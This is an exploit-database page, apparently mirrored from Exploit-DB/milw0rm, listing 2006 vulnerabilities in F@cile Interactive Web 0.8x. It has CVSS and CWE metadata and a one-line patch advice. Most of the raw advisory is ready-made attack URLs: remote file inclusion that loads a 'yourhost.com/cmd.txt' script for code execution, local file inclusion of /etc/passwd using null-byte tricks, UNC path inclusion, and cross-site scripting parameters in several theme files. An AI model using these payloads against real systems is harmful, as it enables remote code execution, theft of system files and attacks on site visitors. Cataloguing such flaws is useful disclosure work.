header-logo
Suggest Exploit
vendor:
F@cile Interactive Web
by:
nukedx.com, milw0rm.com
7.5
CVSS
HIGH
File Inclusion Vulnerabilities, Cross Site Scripting, Information disclosure
94, 79, 200
CWE
Product Name: F@cile Interactive Web
Affected Version From: 0.8x
Affected Version To: 0.8x
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities

This exploits works on F@cile Interactive Web <= 0.8x. It includes File Inclusion Vulnerabilities, Cross Site Scripting, and Information disclosure. The File Inclusion Vulnerabilities can be exploited by sending a malicious URL to the victim. The Cross Site Scripting can be exploited by sending a malicious URL with XSS payloads. The Information disclosure can be exploited by sending a malicious URL with an etc/passwd payload.

Mitigation:

The user should update to the latest version of F@cile Interactive Web and apply the necessary patches.
Source

Exploit-DB raw data:

F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on F@cile Interactive Web <= 0.8x 
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
File Inclusion Vulnerabilities.
http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
Cross Site Scripting.
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
Information disclosure
http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]